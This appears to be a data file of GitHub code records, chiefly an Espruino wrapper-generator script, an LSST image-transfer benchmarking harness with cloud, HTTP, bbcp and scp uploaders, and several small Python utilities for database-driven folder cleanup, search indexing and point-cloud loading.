'jsvIsStringEqual(parentName, \"'+className+'\")'\n n = 0;\n # IMPORTANT - we expect built-in objects to have their name stored\n # as a string in the varData element\n #checkOffsets = []\n #checkCharacters = []\n #for ch in className:\n # checkOffsets.append(n)\n # checkCharacters.append(ch)\n # n = n + 1\n #checkOffsets.append(n)\n #checkCharacters.append(\"\\\\0\")\n #return createStringCompare(\"parent->varData.str\", checkOffsets, checkCharacters)\n return \"jswIsParentNamed(parent, \\\"\"+className+\"\\\")\"\n else:\n if className==\"String\": return \"jsvIsString(parent)\"\n if className==\"Pin\": return \"jsvIsPin(parent)\"\n if className==\"Integer\": return \"jsvIsInt(parent)\"\n if className==\"Double\": return \"jsvIsFloat(parent)\"\n if className==\"Number\": return \"jsvIsInt(parent) || jsvIsFloat(parent)\"\n if className==\"Object\": return \"parent\" # we assume all are objects\n if className==\"Array\": return \"jsvIsArray(parent)\"\n if className==\"ArrayBuffer\": return \"jsvIsArrayBuffer(parent) || jsvIsArrayBufferView(parent)\"\n if className==\"Function\": return \"jsvIsFunction(parent)\"\n return \"jswHasConstructorNamed(parent, \\\"\"+className+\"\\\")\"\n #n = 0\n #checkOffsets = []\n #checkCharacters = []\n #for ch in className:\n # checkOffsets.append(n)\n # checkCharacters.append(ch)\n # n = n + 1\n #checkOffsets.append(n)\n #checkCharacters.append(\"\\\\0\")\n # return createStringCompare(\"constructorName->varData.str\", checkOffsets, checkCharacters)\n\nprint(\"Building decision tree\")\ntree = {}\nfor jsondata in jsondatas:\n if \"name\" in jsondata:\n jsondata[\"static\"] = not (jsondata[\"type\"]==\"property\" or jsondata[\"type\"]==\"method\")\n\n classTest = \"!parent\"\n if not jsondata[\"type\"]==\"constructor\":\n if \"class\" in jsondata: classTest = getTestFor(jsondata[\"class\"], jsondata[\"static\"])\n jsondata[\"classTest\"] = classTest\n # now add to tree\n 
addToTree(tree, jsondata[\"name\"], jsondata)\n#tree = sorted(tree, key=common.get_name_or_space)\n# ------------------------------------------------------------------------------------------------------\n#print json.dumps(tree, sort_keys=True, indent=2)\n# ------------------------------------------------------------------------------------------------------\nprint(\"Outputting decision tree\")\nwrapperFile = open('src/jswrapper.c', 'w')\n\ndef codeOut(s):\n# print str(s)\n wrapperFile.write(s+\"\\n\");\n\ndef getUnLockGetter(varType, name, funcName):\n if varType==\"float\": return \"jsvGetFloatAndUnLock(\"+name+\")\"\n if varType==\"int\": return \"jsvGetIntegerAndUnLock(\"+name+\")\"\n if varType==\"bool\": return \"jsvGetBoolAndUnLock(\"+name+\")\"\n if varType==\"pin\": return \"jshGetPinFromVarAndUnLock(\"+name+\")\"\n print(\"ERROR: getUnLockGetter: Unknown type '\"+varType+\"' for \"+funcName+\":\"+name)\n exit(1)\n\ndef getCreator(varType, value, funcName):\n if varType==\"float\": return \"jsvNewFromFloat(\"+value+\")\"\n if varType==\"int\": return \"jsvNewFromInteger(\"+value+\")\"\n if varType==\"bool\": return \"jsvNewFromBool(\"+value+\")\"\n if varType==\"JsVar\": return value\n print(\"ERROR: getCreator: Unknown type '\"+varType+\"'\"+\"' for \"+funcName)\n exit(1)\n\ndef codeOutFunctionObject(indent, obj):\n codeOut(indent+\"// Object \"+obj[\"name\"]+\" (\"+obj[\"filename\"]+\")\")\n if \"#if\" in obj: codeOut(indent+\"#if \"+obj[\"#if\"]);\n codeOut(indent+\"jspParseVariableName();\")\n codeOut(indent+\"return jspNewObject(jsiGetParser(), \\\"\"+obj[\"name\"]+\"\\\", \\\"\"+obj[\"instanceof\"]+\"\\\");\");\n if \"#if\" in obj: codeOut(indent+\"#endif //\"+obj[\"#if\"]);\n\ndef codeOutFunction(indent, func):\n if func[\"type\"]==\"object\":\n codeOutFunctionObject(indent, func)\n return\n name = \"\"\n if \"class\" in func:\n name = name + func[\"class\"]+\".\";\n name = name + func[\"name\"]\n print(name)\n codeOut(indent+\"// \"+name+\" (\"+func[\"filename\"]+\")\")\n hasThis = func[\"type\"]==\"property\" or func[\"type\"]==\"method\"\n if (\"generate\" in func) or (\"generate_full\" in func):\n argNames = [\"a\",\"b\",\"c\",\"d\"];\n params = []\n if \"params\" in func: params = func[\"params\"]\n if len(params)==0:\n if func[\"type\"]==\"variable\" or common.is_property(func):\n codeOut(indent+\"jspParseVariableName();\")\n else:\n codeOut(indent+\"jspParseEmptyFunction();\")\n elif len(params)==1 and params[0][1]!=\"JsVarName\":\n codeOut(indent+\"JsVar *\"+params[0][0]+\" = jspParseSingleFunction();\")\n elif len(params)<9:\n funcName = \"jspParseFunction8\"\n paramCount = 8\n if len(params)<5:\n funcName = \"jspParseFunction\"\n paramCount = 4\n paramDefs = []\n paramPtrs = []\n skipNames = \"0\"\n n = 0\n letters = [\"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"H\"];\n for param in params:\n paramDefs.append(\"*\"+param[0])\n paramPtrs.append(\"&\"+param[0])\n if param[1]==\"JsVarName\": skipNames = skipNames + \"|JSP_NOSKIP_\"+letters[n]\n n = n + 1\n while len(paramPtrs)varData.str[0], str)==0;')\ncodeOut('}');\ncodeOut('');\ncodeOut('');\n\ncodeOut('JsVar *jswHandleFunctionCall(JsVar *parent, JsVar *parentName, const char *name) {')\ncodeOut(' switch (name[0]) {')\nfor firstChar in tree:\n codeOut(\" case '\"+firstChar+\"': {\")\n print(\"char '\"+firstChar+\"'\")\n codeOutTree(\" \", tree[firstChar], 1)\n codeOut(\" break;\");\n codeOut(\" }\")\ncodeOut(' } /*switch*/')\ncodeOut(' // Handle pin names - eg LED1 or D5 (this is hardcoded in 
build_jsfunctions.py)')\ncodeOut(' int pin = jshGetPinFromString(name);')\ncodeOut(' if (pin>=0) {')\ncodeOut(' jspParseVariableName();')\ncodeOut(' return jsvNewFromPin(pin);')\ncodeOut(' }')\ncodeOut(' return JSW_HANDLEFUNCTIONCALL_UNHANDLED;')\ncodeOut('}')\n\n\n#codeOut(' if (parent) {')\n#codeOut(' // ------------------------------------------ METHODS ON OBJECT')\n#if \"parent\" in tree:\n# codeOutTree(\" \", tree[\"parent\"], 0)\n#codeOut(' // ------------------------------------------ INSTANCE + STATIC METHODS')\n#for className in tree:\n# if className!=\"parent\" and className!=\"!parent\" and not \"parentName\" in className and not \"constructorName\" in className:\n# codeOut(' if ('+className+') {')\n# codeOutTree(\" \", tree[className], 0)\n# codeOut(\" }\")\n#codeOut(' // ------------------------------------------ INSTANCE METHODS WE MUST CHECK CONSTRUCTOR FOR')\n#codeOut(' JsVar *constructorName = jsvIsObject(parent)?jsvSkipOneNameAndUnLock(jsvFindChildFromString(parent, JSPARSE_CONSTRUCTOR_VAR)):0;')\n#codeOut(' if (constructorName && jsvIsName(constructorName)) {')\n#first = True\n#for className in tree:\n# if \"constructorName\" in className:\n# if first:\n# codeOut(' if ('+className+') {')\n# first = False\n# else:\n# codeOut(' } else if ('+className+') {')\n# codeOut(' jsvUnLock(constructorName);constructorName=0;')\n# codeOutTree(\" \", tree[className], 0)\n#if not first:\n# codeOut(\" } else \")\n#codeOut(' jsvUnLock(constructorName);');\n#codeOut(' }')\n#codeOut(' } else { /* if (!parent) */')\n#codeOut(' // ------------------------------------------ FUNCTIONS')\n#codeOut(' // Handle pin names - eg LED1 or D5 (this is hardcoded in build_jsfunctions.py)')\n#codeOut(' int pin = jshGetPinFromString(name);')\n#codeOut(' if (pin>=0) {')\n#codeOut(' jspParseVariableName();')\n#codeOut(' return jsvNewFromPin(pin);')\n#codeOut(' }')\n#if \"!parent\" in tree:\n# codeOutTree(\" \", tree[\"!parent\"], 0)\n#codeOut(' }');\n#codeOut(' return JSW_HANDLEFUNCTIONCALL_UNHANDLED;')\n#codeOut('}')\n#codeOut('')\n\n\n# ---------------------------------------------------------------------------------------------\n# ---------------------------------------------------------------------------------------------\n# ---------------------------------------------------------------------------------------------\nbuiltinChecks = []\nnotRealObjects = []\nfor jsondata in jsondatas:\n if \"class\" in jsondata:\n check = 'strcmp(name, \"'+jsondata[\"class\"]+'\")==0';\n if \"not_real_object\" in jsondata:\n notRealObjects.append(check)\n if not check in builtinChecks:\n builtinChecks.append(check)\n\n\ncodeOut('bool jswIsBuiltInObject(const char *name) {')\ncodeOut(' return\\n'+\" ||\\n \".join(builtinChecks)+';')\ncodeOut('}')\n\n\n","repo_name":"espruino/Espruino","sub_path":"scripts/build_jswrapper_efficient.py","file_name":"build_jswrapper_efficient.py","file_ext":"py","file_size_in_byte":14170,"program_lang":"python","lang":"en","doc_type":"code","stars":2648,"dataset":"github-code","pt":"78"} +{"seq_id":"32524235149","text":"import pyodbc\nimport os\nimport shutil\nimport ConfigParser\nimport logging\nimport logging.config\n\nlogging.config.fileConfig(\"settings.conf\")\n#create logger\nlogger = logging.getLogger(\"example\")\n\n\n#read the configuration information\nconf = ConfigParser.ConfigParser()\nconf.read('settings.conf')\n\n\n#conf.get('DB', 'server'), conf.get('DB', 'database'), conf.get('DB', 'username'), conf.get('DB', 'password')\n\nlogger.info(\"Begin to process\")\nconn_str = 
'DRIVER={SQL Server};SERVER=%s;DATABASE=%s;UID=%s;PWD=%s' % (conf.get('DB','server'), conf.get('DB','database'), conf.get('DB','username'), conf.get('DB','password'))\nlogger.info(conn_str)\ncnxn = pyodbc.connect(conn_str)\ncursor = cnxn.cursor()\n\n\nserver_ip = conf.get('Settings',\"server_ip\")\ndata_folder = conf.get('Settings',\"data_folder\")\nremoved_folder = conf.get('Settings',\"removed_folder\")\n\n# get all host for the specify server\ncursor.execute(\"\"\"select distinct H.HostName from Main_HostList H, Main_Goods G, Main_Server S\n where H.GoodsNO = G.GoodsNO\n and G.ServerID = S.ServerID and S.IP=?\"\"\", server_ip)\n\nhosts = []\nfor row in cursor:\n hosts.append(row.HostName)\n\n# remove folder that has not in the db\nfor subdir in os.listdir(data_folder):\n if not subdir in hosts:\n logger.info(\"folder %s doesn't exists on db\" % subdir)\n source = data_folder + subdir\n dest = removed_folder + subdir\n shutil.move(source, dest)\n\nlogger.info(\"Finished\")\n\n","repo_name":"chenboxing/PyDataSync","sub_path":"virhost_sync.py","file_name":"virhost_sync.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40115229609","text":"#!/usr/bin/env python\n\nfrom __future__ import annotations\nimport abc\nimport argparse\nfrom datetime import datetime, timedelta\nimport functools\nimport logging\nimport os\nfrom pathlib import Path\nimport re\nimport socket\nimport subprocess\nimport tempfile\nimport time\nfrom urllib3.connection import HTTPConnection\n\n\ndef build_parser() -> argparse.ArgumentParser:\n \"\"\"Build an argument parser for command-line options.\"\"\"\n\n parser = argparse.ArgumentParser(\n description=\"Transfer a stream of CCD images.\"\n )\n parser.add_argument('-d', '--destination', metavar='URL', required=True,\n help=(\"URL with\"\n \" gsapi, boto, minio, https, http, bbcp, scp\"\n \" scheme\"))\n parser.add_argument('-s', '--starttime', metavar='HH:MM', required=True,\n help=\"local time to start simulation\")\n parser.add_argument('-n', '--numexp', metavar='EXPOSURES', type=int,\n required=True, help=\"number of exposures to simulate\")\n parser.add_argument('-c', '--ccds', metavar='CCDS', type=int,\n default=1, help=\"number of CCDs to simulate\")\n parser.add_argument('-i', '--interval', type=int, default=17,\n help=\"interval between exposures in sec\")\n parser.add_argument('-I', '--inputfile', type=Path,\n default=\"./data/S00.fits\", help=\"input directory\")\n parser.add_argument('-t', '--tempdir', type=Path, default=\"/tmp\",\n help=\"temporary directory\")\n parser.add_argument('-z', '--compress', action='store_true',\n help=\"compress before transfer\")\n parser.add_argument('-P', '--private', action='store_true',\n help=\"use private Google Cloud interconnect\")\n parser.add_argument('-K', '--keepalive', action='store_true',\n help=\"use TCP keepalive options\")\n return parser\n\n\nclass Waiter:\n \"\"\"Wait until the appropriate time for a given exposure.\n\n Each exposure is triggered at a given start time plus a time interval\n between exposures. 
These times are computed as wall-clock times rather\n than relative times to ensure consistency across multiple processes and\n computers.\n\n Parameters\n ----------\n hour, minute: `int`\n The time to start the first exposure.\n interval: `int`\n Interval between exposures in seconds.\n \"\"\"\n\n def __init__(self, hour: int, minute: int, interval: int):\n self.base_time = datetime.now().replace(hour=hour, minute=minute,\n second=0, microsecond=0)\n self.interval = interval\n\n def wait_exposure(self, num: int):\n \"\"\"Wait for the given exposure number.\n\n Parameters\n ----------\n num: `int`\n Number of the exposure to wait for.\n \"\"\"\n when = self.base_time + timedelta(seconds=num * self.interval)\n delay = (when - datetime.now()).total_seconds()\n delay_str = f\"{abs(delay)} seconds for exposure {num} at {when}\"\n if delay < 0:\n logging.info(\"Late \" + delay_str)\n return\n logging.info(\"Sleeping \" + delay_str)\n time.sleep(delay)\n\n\ndef log_timing(func):\n \"\"\"Decorator to log timing information for a function.\"\"\"\n\n @functools.wraps(func)\n def wrapper(self, *args, **kwargs):\n logging.info(f\"Start {func.__name__}\")\n start = time.time()\n try:\n res = func(self, *args, **kwargs)\n finally:\n delta = time.time() - start\n logging.info(f\"End {func.__name__} = {delta}\")\n return res\n\n return wrapper\n\n\n@log_timing\ndef copy(source: Path, temp: Path, dest: Path, compress: bool = False) -> Path:\n \"\"\"Copy a file to a temporary location, optionally with compression.\n\n Parameters\n ----------\n source: `pathlib.Path`\n Source file location.\n temp: `pathlib.Path`\n Temporary directory to which to copy the file.\n Intended to ensure that transfers come from RAM rather than disk.\n dest: `pathlib.Path`\n Destination location within temporary directory.\n compress: `bool`, optional\n Compress the file with fpack if true.\n\n Returns\n -------\n finaldest: `pathlib.Path`\n Destination location updated with compression suffix if appropriate.\n \"\"\"\n (temp / dest).parent.mkdir(parents=True, exist_ok=True)\n logging.info(f\"Copying {source} to {temp / dest}\")\n subprocess.run([\"cp\", f\"{source}\", f\"{temp / dest}\"])\n if compress:\n logging.info(f\"Compressing {temp / dest}\")\n subprocess.run([\"fpack\", f\"{temp / dest}\"])\n dest = dest.with_suffix(\".fits.fz\")\n return dest\n\n\nclass Uploader(abc.ABC):\n \"\"\"Abstract base class for classes that upload files from the camera.\"\"\"\n\n @classmethod\n def create(cls, dest: str) -> Uploader:\n \"\"\"Create an Uploader based on the scheme of its destination URI.\n\n Parameters\n ----------\n dest: `str`\n Destination URI.\n\n Returns\n -------\n uploader: `Uploader`\n Instance of the Uploader class configured for transfers.\n \"\"\"\n logging.info(f\"Creating uploader for {dest}\")\n if dest.startswith(\"gsapi://\"):\n return GsapiUploader(dest[len(\"gsapi://\"):])\n if dest.startswith(\"boto://\"):\n return BotoUploader(dest[len(\"boto://\"):])\n if dest.startswith(\"minio://\"):\n return MinioUploader(dest[len(\"minio://\"):])\n if dest.startswith(\"https://\") or dest.startswith(\"http://\"):\n return HttpUploader(dest)\n if dest.startswith(\"bbcp://\"):\n return BbcpUploader(dest[len(\"bbcp://\"):])\n if dest.startswith(\"scp://\"):\n return ScpUploader(dest[len(\"scp://\"):])\n raise RuntimeError(f\"Unrecognized URL {dest}\")\n\n def transfer(self, temp_dir: Path, source: Path):\n \"\"\"Main method for transferring files.\n\n Implemented by subclasses.\n\n Destination is set by URI plus the 
result of the `copy` function.\n\n Parameters\n ----------\n temp_dir: `pathlib.Path`\n Temporary directory to use during transfer.\n source: `pathlib.Path`\n Source file to transfer.\n \"\"\"\n raise NotImplementedError(\"transfer not implemented\")\n\n\nclass GsapiUploader(Uploader):\n \"\"\"Uploader using the Google Cloud Storage API.\"\"\"\n\n def __init__(self, dest: str):\n from google.cloud import storage\n if \"/\" in dest:\n bucket, self.prefix = dest.split(\"/\", 1)\n else:\n bucket = dest\n self.prefix = \"\"\n logging.info(f\"gsapi: opening bucket {bucket}\"\n f\", saving prefix '{self.prefix}'\")\n self.bucket = storage.Client().bucket(bucket)\n try:\n # Download something to \"prime\" the connection.\n # Might be better to upload something instead.\n _ = self.bucket.blob(\".null\").download_as_string()\n except Exception as exc:\n logging.info(f\"Ignored: {exc}\")\n\n @log_timing\n def transfer(self, temp_dir: Path, source: Path):\n logging.info(f\"gsapi: uploading to {self.prefix}/{source}\")\n # Set a large chunk size to ensure that the API doesn't try to break\n # up the file into multiple transfers.\n size = 100*1024*1024\n if self.prefix == \"\":\n blob = self.bucket.blob(f\"{source}\", chunk_size=size)\n else:\n blob = self.bucket.blob(f\"{self.prefix}/{source}\", chunk_size=size)\n blob.upload_from_filename(temp_dir / source)\n\n\nclass BotoUploader(Uploader):\n \"\"\"Uploader using the Boto object store API.\n\n Should work for AWS S3 or Google Cloud Storage or MinIO.\"\"\"\n\n def __init__(self, dest: str):\n import boto3\n host, self.bucket, self.prefix = dest.split(\"/\", 2)\n logging.info(f\"boto: opening host {host}, saving bucket {self.bucket}\"\n f\", prefix '{self.prefix}'\")\n self.client = boto3.client('s3')\n self.client.put_object(Bucket=self.bucket, Key=\".null\",\n Body=b\"\", ContentLength=0)\n\n @log_timing\n def transfer(self, temp_dir: Path, source: Path):\n logging.info(f\"boto: uploading to {self.prefix}/{source}\")\n self.client.upload_file(temp_dir / source,\n self.bucket, f\"{self.prefix}/{source}\")\n\n\nclass MinioUploader(Uploader):\n \"\"\"Uploader using the MinIO object store API.\"\"\"\n\n def __init__(self, dest: str):\n from minio import Minio\n host, self.bucket, self.prefix = dest.split(\"/\", 2)\n logging.info(f\"minio: opening host {host}, saving bucket {self.bucket}\"\n f\", prefix '{self.prefix}'\")\n self.conn = Minio(host)\n self.conn.put_object(self.bucket, \".null\", BytesIO(b\"\"), 0)\n\n @log_timing\n def transfer(self, temp_dir: Path, source: Path):\n logging.info(f\"minio: uploading to {self.prefix}/{source}\")\n self.conn.fput_object(\n self.bucket,\n f\"{self.prefix}/{source}\",\n temp_dir / source\n )\n\n\nclass HttpUploader(Uploader):\n \"\"\"Uploader using HTTP PUT to an ordinary web server.\"\"\"\n\n def __init__(self, dest: str):\n import requests\n logging.info(f\"http: opening session to {dest}\")\n self.url = dest\n self.session = requests.Session()\n\n @log_timing\n def transfer(self, temp_dir: Path, source: Path):\n logging.info(f\"http: putting to {self.url}/{source}\")\n with (temp_dir / source).open(\"rb\") as s:\n r = self.session.put(f\"{self.url}/{source}\", data=s)\n r.raise_for_status()\n\n\nclass BbcpUploader(Uploader):\n \"\"\"Uploader using bbcp to a remote filesystem.\"\"\"\n\n def __init__(self, dest: str):\n self.host, path = dest.split(\"/\", 1)\n logging.info(f\"bbcp: saving host {self.host} and path {path}\")\n self.path = Path(path)\n\n @log_timing\n def transfer(self, temp_dir: Path, source: 
Path):\n logging.info(f\"bbcp: dir {self.path / source.parent}; file {source}\")\n # -A is supposed to create the remote directory, but it appears to be\n # buggy.\n subprocess.run([\"bbcp\", \"-A\", self.path / source,\n f\"{self.host}:{self.path / source}\"])\n\n\nclass ScpUploader(Uploader):\n \"\"\"Uploader using scp to a remote filesystem.\"\"\"\n\n def __init__(self, dest: str):\n self.host, path = dest.split(\"/\", 1)\n logging.info(f\"scp: saving host {self.host} and path {path}\")\n self.path = Path(path)\n\n @log_timing\n def transfer(self, temp_dir: Path, source: Path):\n logging.info(f\"scp: dir {self.path / source.parent}; file {source}\")\n with (temp_dir / source).open(\"rb\") as s:\n # We may have to create the remote directory; try to do it all in\n # one ssh connection for efficiency.\n subprocess.run([\"ssh\", self.host,\n f\"mkdir -p {self.path / source.parent};\"\n f\"cat > {self.path / source}\"],\n stdin=s)\n\n\ndef simulate(\n ccd_name: str,\n starttime: str,\n destination: str,\n interval: int,\n tempdir: Path,\n numexp: int,\n inputfile: Path,\n compress: bool,\n) -> None:\n \"\"\"Simulate a series of CCD image transfers.\n\n Parameters\n ----------\n ccd_name: `str`\n Name of the CCD to simulate transferring.\n starttime: `str`\n Time in HH:MM to start transferring.\n destination: `str`\n Destination URI.\n interval: `int`\n Interval between transfers in seconds.\n tempdir: `pathlib.Path`\n Temporary directory to use.\n numexp: `int`\n Number of exposures to simulate.\n inputfile: `pathlib.Path`\n Path to input image file (same one used for all transfers).\n compress: `bool`\n Compress the input if True.\n \"\"\"\n # Make sure the CCD name is in the log messages to distinguish between\n # processes.\n logging.basicConfig(\n format=f\"{ccd_name}\" + \" {asctime} {message}\",\n style=\"{\",\n level=\"INFO\"\n )\n\n # Check socket options.\n print(f\"Socket opts = {HTTPConnection.default_socket_options}\")\n\n hour, minute = starttime.split(\":\")\n # Pick a sequence number that will not overlap with other runs.\n seqnum_start = int(hour + minute) * 10\n\n uploader = Uploader.create(destination)\n\n waiter = Waiter(int(hour), int(minute), interval)\n\n now = datetime.now()\n obs_day = now.strftime(\"%Y%m%d\")\n obs_day_str = now.strftime(\"%Y-%m-%d\")\n\n with tempfile.TemporaryDirectory(dir=tempdir) as temp_dir:\n logging.info(f\"Using temp directory {temp_dir}\")\n temp_path = Path(temp_dir)\n for i in range(numexp):\n waiter.wait_exposure(i)\n seqnum = seqnum_start + i\n source_path = inputfile\n\n dest_path = Path(obs_day_str).joinpath(\n f\"{obs_day}{seqnum:05d}\",\n f\"MC_O_{obs_day}_{seqnum:05d}_{ccd_name}.fits\"\n )\n logging.info(f\"Copying from {source_path} to\"\n f\" {temp_path / dest_path}\"\n f\" with compress = {compress}\")\n dest_path = copy(source_path, temp_path, dest_path, compress)\n uploader.transfer(temp_path, dest_path)\n\n\ndef main():\n \"\"\"Main program.\"\"\"\n\n # Set up Google credentials if needed.\n if \"APXFR_KEY\" in os.environ:\n print(\"Using APXFR_KEY credentials\")\n with open(\"/root/secret.json\", \"w\") as f:\n print(os.environ[\"APXFR_KEY\"], file=f)\n os.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = \"/root/secret.json\"\n\n # Build and use the argument parser.\n parser = build_parser()\n args = parser.parse_args()\n\n # Figure out a node number that we can use to create a unique CCD name.\n host_name = socket.gethostname()\n node_match = re.search(r'-(\\d+)$', host_name)\n if node_match:\n node_num = int(node_match[1])\n 
else:\n node_match = re.search(r'-(\\w{5})$', host_name)\n if node_match:\n node_num = int(node_match[1], 36)\n else:\n node_match = re.search(r'(\\d+)', host_name)\n if node_match:\n node_num = int(node_match[1])\n else:\n node_num = 0\n\n # Private network for Google Cloud Storage requires pointing the\n # well-known API hostname to an internal IP address. In a container, we\n # can append to /etc/hosts; on bare metal, this needs to be handled\n # externally.\n if args.private:\n print(\"Using private network\")\n with open(\"/etc/hosts\", \"a\") as f:\n print(f\"199.36.153.{int(node_num) % 4 + 8} storage.googleapis.com\",\n file=f)\n\n # Attempt to set HTTPConnection socket options to enable TCP keepalive.\n if args.keepalive:\n print(\"Using TCP keepalive\")\n HTTPConnection.default_socket_options += [\n (socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1),\n (socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, 1),\n (socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, 1)\n ]\n\n # Fork a process for each CCD to be transferred.\n jobs = []\n for ccd in range(args.ccds):\n pid = os.fork()\n if pid == 0:\n simulate(\n f\"{node_num}-{ccd}\",\n args.starttime,\n args.destination,\n args.interval,\n args.tempdir,\n args.numexp,\n args.inputfile,\n args.compress\n )\n logging.info(\"Child process exiting\")\n exit(0)\n else:\n jobs.append(pid)\n # Wait for all child processes.\n for job in jobs:\n os.waitpid(job, 0)\n\n # Sleep so that container logs can be obtained more easily.\n print(\"Main process sleeping\")\n while True:\n time.sleep(1000000)\n pass\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"lsst-dm/google-poc-2020","sub_path":"apxfr/src/harness.py","file_name":"harness.py","file_ext":"py","file_size_in_byte":16092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38196928804","text":"from nltk.tokenize import RegexpTokenizer\nfrom nltk.stem import PorterStemmer\nimport json\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import urldefrag\nimport os\nimport math\nimport re\n\nALPHANUMERIC_WORDS = re.compile('[a-zA-Z0-9]+')\n\n\nclass DocumentInfo:\n def __init__(self, id, url, length):\n self._id = id\n self._url = url\n self._length = length\n\n @property\n def id(self):\n return self._id\n\n @property\n def url(self):\n return self._url\n\n @property\n def length(self):\n return self._length\n\n\n'''\nCode to parse JSON file and tokenize words alphanumerically, ignoring stopwords. Will also fix broken HTML\n'''\n\n\ndef parseFile(filePath: str):\n # filePath is a path to a JSON object file. Get the URL and content from obj file.\n with open(filePath, 'r') as file:\n json_obj = json.load(file)\n\n url = json_obj['url']\n\n # Defragging the URL\n url, fragment = urldefrag(url)\n\n # Using beautifulsoup to parse HTML content\n page_obj = BeautifulSoup(json_obj['content'], 'lxml')\n\n # Tokenizing the text and storing in dictionary. 
Key (token) value (frequency)\n return (pageTokenize(page_obj), url)\n\n\ndef pageTokenize(page: object):\n '''\n Tokenizes the content retrieved from BeautifulSoup's get_text().\n Returns a dictionary of the tokens as keys and frequency as values.\n This tokenizer also takes the *stems* from every token and stores it as\n keys.\n '''\n\n # Tokenizing the page and storing tokens in a list\n # regTokenizer = RegexpTokenizer(r'\w+')\n # tokens = regTokenizer.tokenize(page.get_text())\n\n text = page.get_text()\n\n # Stemming each token and adding to a dictionary\n stemmer = PorterStemmer()\n stems = dict()\n for token in re.findall(ALPHANUMERIC_WORDS, text):\n stemmedWord = stemmer.stem(token)\n\n # Checking if it's already in the dictionary - if it is, add by 1. If not, add a new entry\n if stemmedWord in stems:\n stems[stemmedWord] += 1\n else:\n stems[stemmedWord] = 1\n\n return stems\n\n\ndef createInvertedIndex():\n # Data structure (dictionary) to hold the inverted index in memory\n index = dict()\n\n # Dictionary to hold the mapping between page ID and url\n pageIDs = dict()\n\n pageCounter = 0\n\n # Iterating through all the inner folders in DEV folder\n path_to_inner = '../FinalSubmission/DEV/'\n for folder in os.listdir(path_to_inner):\n if folder == '.DS_Store':\n continue\n # Iterating through all the JSON files in the inner folder\n json_files = []\n\n for filename in os.listdir(os.path.join(path_to_inner, folder)):\n json_files.append(os.path.join(path_to_inner, folder, filename))\n\n for json_file in json_files:\n\n # Processing each json file\n words, url = parseFile(json_file)\n\n normalizedSum = 0\n for word, counter in words.items():\n # Squaring each word frequency and adding to normalizedSum\n normalizedSum += counter * counter\n\n # Taking the square root of the normalized sum\n normalizedSum = math.sqrt(normalizedSum)\n\n # Document Information Object\n documentInfoObj = DocumentInfo(pageCounter, url, normalizedSum)\n\n # After processing, store a mapping between the actual file and the id\n pageIDs[pageCounter] = documentInfoObj\n pageCounter += 1\n\n with open('documentLengths.txt', 'w') as f:\n for docID, infoObj in pageIDs.items():\n f.write(f'{docID},{infoObj.url},{infoObj.length}\\n')\n\n\nif __name__ == '__main__':\n createInvertedIndex()","repo_name":"andy-phu/ZotSearch-backend","sub_path":"documentLengthMaker.py","file_name":"documentLengthMaker.py","file_ext":"py","file_size_in_byte":3722,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"2175378077","text":"import traceback\nfrom enum import Enum\n\n\nclass AutoIncrementEnum(Enum):\n def __new__(cls):\n value = len(cls.__members__) + 1\n obj = object.__new__(cls)\n obj._value_ = value\n return obj\n\n\nclass SingletonMeta(type):\n __instances = {}\n\n def __call__(cls, *args, **kwargs):\n if cls not in cls.__instances:\n cls.__instances[cls] = super(SingletonMeta, cls).__call__(*args, **kwargs)\n return cls.__instances[cls]\n\n\nasync def coroutine_with_no_exception(coro, f_callback=None, *args, **kwargs):\n try:\n await coro\n except BaseException as e:\n if f_callback is not None:\n f_callback(coro, e, *args, **kwargs)\n\n\ndef default_coroutine_exception_callback(_, e):\n from dist_system.logger import Logger\n Logger().log('[!] 
exception occurs in coroutine :', e)\n Logger().log(traceback.format_exc())\n","repo_name":"DrawML/dist-task","sub_path":"src/dist_system/library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"30082215560","text":"import pickle, time, warnings\nimport numpy as np\n\nimport torch\nfrom torch.utils.data import Dataset, IterableDataset, DataLoader, Sampler, BatchSampler\n\nfrom utils.tools import Config as cfg\nfrom utils.tools import DataProcessing as DP\n\nclass PointCloudsDataset(Dataset):\n def __init__(self, dir, labels_available=True):\n self.paths = list(dir.glob(f'*.npy'))\n self.labels_available = labels_available\n\n def __getitem__(self, idx):\n path = self.paths[idx]\n\n points, labels = self.load_npy(path)\n\n points_tensor = torch.from_numpy(points).float()\n labels_tensor = torch.from_numpy(labels).long()\n\n return points_tensor, labels_tensor\n\n def __len__(self):\n return len(self.paths)\n\n def load_npy(self, path):\n r\"\"\"\n load the point cloud and labels of the npy file located in path\n\n Args:\n path: str\n path of the point cloud\n keep_zeros: bool (optional)\n keep unclassified points\n \"\"\"\n cloud_npy = np.load(path, mmap_mode='r').T\n points = cloud_npy[:,:-1] if self.labels_available else points\n\n if self.labels_available:\n labels = cloud_npy[:,-1]\n\n # balance training set\n points_list, labels_list = [], []\n for i in range(len(np.unique(labels))):\n try:\n idx = np.random.choice(len(labels[labels==i]), 8000)\n points_list.append(points[labels==i][idx])\n labels_list.append(labels[labels==i][idx])\n except ValueError:\n continue\n if points_list:\n points = np.stack(points_list)\n labels = np.stack(labels_list)\n labeled = labels>0\n points = points[labeled]\n labels = labels[labeled]\n\n return points, labels\n\nclass CloudsDataset(Dataset):\n def __init__(self, dir, data_type='npy'):\n self.path = dir\n self.paths = list(dir.glob(f'*.{data_type}'))\n self.size = len(self.paths)\n self.data_type = data_type\n self.input_trees = {'training': [], 'validation': []}\n self.input_colors = {'training': [], 'validation': []}\n self.input_labels = {'training': [], 'validation': []}\n self.input_names = {'training': [], 'validation': []}\n self.val_proj = []\n self.val_labels = []\n self.val_split = '1_'\n\n self.load_data()\n print('Size of training : ', len(self.input_colors['training']))\n print('Size of validation : ', len(self.input_colors['validation']))\n\n def load_data(self):\n for i, file_path in enumerate(self.paths):\n t0 = 